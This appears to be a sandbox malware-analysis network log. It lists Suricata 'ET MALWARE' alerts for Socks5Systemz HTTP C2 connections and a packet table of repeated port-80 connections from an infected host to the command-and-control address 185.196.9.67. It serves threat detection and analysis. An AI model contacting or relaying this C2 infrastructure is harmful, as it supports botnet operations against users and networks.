                                                  2024-12-25T09:18:24.759622+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449816185.196.9.6780TCP
                                                  2024-12-25T09:18:25.338114+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449816185.196.9.6780TCP
                                                  2024-12-25T09:18:25.338114+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449816185.196.9.6780TCP
                                                  2024-12-25T09:18:27.002387+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449821185.196.9.6780TCP
                                                  2024-12-25T09:18:27.002387+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449821185.196.9.6780TCP
                                                  2024-12-25T09:18:28.595461+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449827185.196.9.6780TCP
                                                  2024-12-25T09:18:28.595461+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449827185.196.9.6780TCP
                                                  2024-12-25T09:18:30.214459+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449833185.196.9.6780TCP
                                                  2024-12-25T09:18:30.214459+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449833185.196.9.6780TCP
                                                  2024-12-25T09:18:31.814868+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449834185.196.9.6780TCP
                                                  2024-12-25T09:18:31.814868+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449834185.196.9.6780TCP
                                                  2024-12-25T09:18:33.406416+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449840185.196.9.6780TCP
                                                  2024-12-25T09:18:33.406416+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449840185.196.9.6780TCP
                                                  2024-12-25T09:18:34.998748+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449846185.196.9.6780TCP
                                                  2024-12-25T09:18:34.998748+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449846185.196.9.6780TCP
                                                  2024-12-25T09:18:36.589843+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449849185.196.9.6780TCP
                                                  2024-12-25T09:18:36.589843+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449849185.196.9.6780TCP
                                                  2024-12-25T09:18:38.182225+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449853185.196.9.6780TCP
                                                  2024-12-25T09:18:38.182225+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449853185.196.9.6780TCP
                                                  2024-12-25T09:18:39.767910+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449859185.196.9.6780TCP
                                                  2024-12-25T09:18:39.767910+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449859185.196.9.6780TCP
                                                  2024-12-25T09:18:41.409504+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449865185.196.9.6780TCP
                                                  2024-12-25T09:18:41.409504+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449865185.196.9.6780TCP
                                                  2024-12-25T09:18:42.999262+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449866185.196.9.6780TCP
                                                  2024-12-25T09:18:42.999262+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449866185.196.9.6780TCP
                                                  2024-12-25T09:18:44.649727+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449872185.196.9.6780TCP
                                                  2024-12-25T09:18:44.649727+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449872185.196.9.6780TCP
                                                  2024-12-25T09:18:45.234269+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449872185.196.9.6780TCP
                                                  2024-12-25T09:18:45.234269+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449872185.196.9.6780TCP
                                                  2024-12-25T09:18:47.001145+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449878185.196.9.6780TCP
                                                  2024-12-25T09:18:47.001145+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449878185.196.9.6780TCP
                                                  2024-12-25T09:18:48.587573+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449883185.196.9.6780TCP
                                                  2024-12-25T09:18:48.587573+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449883185.196.9.6780TCP
                                                  2024-12-25T09:18:50.193865+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449889185.196.9.6780TCP
                                                  2024-12-25T09:18:50.193865+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449889185.196.9.6780TCP
                                                  2024-12-25T09:18:50.780722+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449889185.196.9.6780TCP
                                                  2024-12-25T09:18:50.780722+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449889185.196.9.6780TCP
                                                  2024-12-25T09:18:52.378431+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449895185.196.9.6780TCP
                                                  2024-12-25T09:18:52.378431+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449895185.196.9.6780TCP
                                                  2024-12-25T09:18:53.961977+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449897185.196.9.6780TCP
                                                  2024-12-25T09:18:53.961977+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449897185.196.9.6780TCP
                                                  2024-12-25T09:18:55.539000+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449902185.196.9.6780TCP
                                                  2024-12-25T09:18:55.539000+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449902185.196.9.6780TCP
                                                  2024-12-25T09:18:57.140811+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449908185.196.9.6780TCP
                                                  2024-12-25T09:18:57.140811+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449908185.196.9.6780TCP
                                                  2024-12-25T09:18:58.961360+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449914185.196.9.6780TCP
                                                  2024-12-25T09:18:58.961360+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449914185.196.9.6780TCP
                                                  2024-12-25T09:19:00.565477+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449916185.196.9.6780TCP
                                                  2024-12-25T09:19:00.565477+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449916185.196.9.6780TCP
                                                  2024-12-25T09:19:02.159920+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449921185.196.9.6780TCP
                                                  2024-12-25T09:19:02.159920+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449921185.196.9.6780TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 25, 2024 09:17:52.670908928 CET4973680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:52.790621042 CET8049736185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:52.790709019 CET4973680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:52.806850910 CET4973680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:52.926614046 CET8049736185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:54.147762060 CET8049736185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:54.149955034 CET4973680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:54.272701979 CET4973680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:54.272990942 CET4973780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:54.392793894 CET8049737185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:54.392885923 CET8049736185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:54.393006086 CET4973680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:54.393022060 CET4973780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:54.393219948 CET4973780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:54.512803078 CET8049737185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:55.752681017 CET8049737185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:55.752768993 CET4973780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:55.956170082 CET4973780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:55.956496954 CET4974080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:56.076461077 CET8049740185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:56.076499939 CET8049737185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:56.076514006 CET4974080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:56.076555967 CET4973780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:56.076725006 CET4974080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:56.196347952 CET8049740185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:57.432785988 CET8049740185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:57.438512087 CET4974080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:57.553869963 CET4974080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:57.554173946 CET4974180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:57.674227953 CET8049741185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:57.674391985 CET4974180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:57.674550056 CET4974180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:57.674761057 CET8049740185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:57.674813986 CET4974080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:57.794045925 CET8049741185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:59.027862072 CET8049741185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:59.027945042 CET4974180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:59.147866011 CET4974180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:59.148147106 CET4974780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:59.267790079 CET8049747185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:59.267868996 CET4974780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:59.267899990 CET8049741185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:17:59.267965078 CET4974180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:59.268060923 CET4974780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:17:59.387526989 CET8049747185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:00.623742104 CET8049747185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:00.623810053 CET4974780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:00.741405010 CET4974780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:00.741734982 CET4975380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:00.861325026 CET8049753185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:00.861393929 CET4975380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:00.861545086 CET4975380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:00.861655951 CET8049747185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:00.861699104 CET4974780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:00.981149912 CET8049753185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:02.216206074 CET8049753185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:02.216329098 CET4975380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:02.335691929 CET4975380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:02.336000919 CET4975480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:02.455545902 CET8049754185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:02.455640078 CET4975480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:02.455797911 CET4975480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:02.456228018 CET8049753185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:02.456276894 CET4975380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:02.575604916 CET8049754185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:03.809645891 CET8049754185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:03.809859037 CET4975480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:03.928617001 CET4975480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:03.928886890 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:04.048439026 CET8049760185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:04.048532009 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:04.048691034 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:04.048739910 CET8049754185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:04.048791885 CET4975480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:04.168365955 CET8049760185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:05.398211002 CET8049760185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:05.398300886 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:05.506959915 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:05.626771927 CET8049760185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:05.973011017 CET8049760185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:05.973086119 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:06.085107088 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:06.085422039 CET4976680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:06.204883099 CET8049760185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:06.204967022 CET4976080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:06.204981089 CET8049766185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:06.205053091 CET4976680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:06.205219984 CET4976680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:06.324661970 CET8049766185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:07.562874079 CET8049766185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:07.563016891 CET4976680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:07.678927898 CET4976680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:07.679207087 CET4977280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:07.798888922 CET8049772185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:07.798975945 CET8049766185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:07.799038887 CET4977280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:07.799079895 CET4976680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:07.799329042 CET4977280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:07.918958902 CET8049772185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:09.155430079 CET8049772185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:09.155867100 CET4977280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:09.272711992 CET4977280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:09.273127079 CET4977880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:09.392898083 CET8049778185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:09.393006086 CET4977880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:09.393126965 CET8049772185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:09.393132925 CET4977880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:09.393182993 CET4977280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:09.512963057 CET8049778185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:10.748431921 CET8049778185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:10.748577118 CET4977880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:10.866630077 CET4977880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:10.867008924 CET4977980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:10.986644983 CET8049779185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:10.986686945 CET8049778185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:10.986752033 CET4977980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:10.986795902 CET4977880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:10.987004995 CET4977980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:11.106550932 CET8049779185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:12.340059042 CET8049779185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:12.340142965 CET4977980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:12.460000992 CET4977980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:12.460309982 CET4978580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:12.579886913 CET8049785185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:12.580010891 CET4978580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:12.580135107 CET8049779185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:12.580188036 CET4977980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:12.580240965 CET4978580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:12.699870110 CET8049785185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:13.932415962 CET8049785185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:13.932503939 CET4978580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:14.054138899 CET4978580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:14.054425955 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:14.175306082 CET8049785185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:14.175339937 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:14.175364017 CET4978580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:14.175441027 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:14.175664902 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:14.295263052 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:15.537405014 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:15.537501097 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:15.648550987 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:15.768935919 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:16.119919062 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:16.120016098 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:16.225821018 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:16.345581055 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:16.701416969 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:16.701518059 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:16.866070032 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:16.866348982 CET4979780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:16.985833883 CET8049797185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:16.985879898 CET8049791185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:16.985963106 CET4979780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:16.985964060 CET4979180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:16.989856005 CET4979780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:17.109399080 CET8049797185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:18.342459917 CET8049797185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:18.344463110 CET4979780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:18.460131884 CET4979780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:18.460522890 CET4980380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:18.580274105 CET8049803185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:18.580367088 CET4980380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:18.580467939 CET8049797185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:18.580631018 CET4980380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:18.580636978 CET4979780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:18.700253963 CET8049803185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:19.930577993 CET8049803185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:19.930721045 CET4980380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:20.093652964 CET4980380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:20.096954107 CET4980980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:20.213752985 CET8049803185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:20.213841915 CET4980380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:20.216471910 CET8049809185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:20.216547966 CET4980980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:20.237310886 CET4980980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:20.356893063 CET8049809185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:21.565387011 CET8049809185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:21.568882942 CET4980980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:21.694478035 CET4980980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:21.694731951 CET4981080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:21.815102100 CET8049810185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:21.815165997 CET8049809185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:21.815326929 CET4980980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:21.815586090 CET4981080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:21.815586090 CET4981080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:21.935240984 CET8049810185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:23.171648979 CET8049810185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:23.171770096 CET4981080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:23.289230108 CET4981080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:23.290019989 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:23.409409046 CET8049810185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:23.409477949 CET4981080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:23.409631014 CET8049816185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:23.409717083 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:23.409917116 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:23.586815119 CET8049816185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:24.759553909 CET8049816185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:24.759622097 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:24.866280079 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:24.986119986 CET8049816185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:25.338036060 CET8049816185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:25.338114023 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:25.513292074 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:25.517226934 CET4982180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:25.633435965 CET8049816185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:25.633502007 CET4981680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:25.636801958 CET8049821185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:25.636878014 CET4982180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:25.646245956 CET4982180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:25.765834093 CET8049821185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:27.002106905 CET8049821185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:27.002387047 CET4982180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:27.116738081 CET4982180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:27.117069006 CET4982780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:27.236680984 CET8049827185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:27.236748934 CET8049821185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:27.236821890 CET4982780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:27.237005949 CET4982180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:27.237009048 CET4982780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:27.357659101 CET8049827185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:28.595397949 CET8049827185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:28.595460892 CET4982780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:28.736609936 CET4982780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:28.736855984 CET4983380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:28.856440067 CET8049833185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:28.856537104 CET4983380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:28.856656075 CET8049827185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:28.856695890 CET4983380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:28.856729984 CET4982780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:28.976356983 CET8049833185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:30.212639093 CET8049833185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:30.214458942 CET4983380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:30.335194111 CET4983380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:30.335505009 CET4983480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:30.455342054 CET8049834185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:30.455390930 CET8049833185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:30.455467939 CET4983480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:30.455516100 CET4983380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:30.455754042 CET4983480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:30.575501919 CET8049834185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:31.814790010 CET8049834185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:31.814867973 CET4983480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:31.929075956 CET4983480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:31.929646969 CET4984080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:32.049407005 CET8049840185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:32.049503088 CET4984080192.168.2.4185.196.9.67
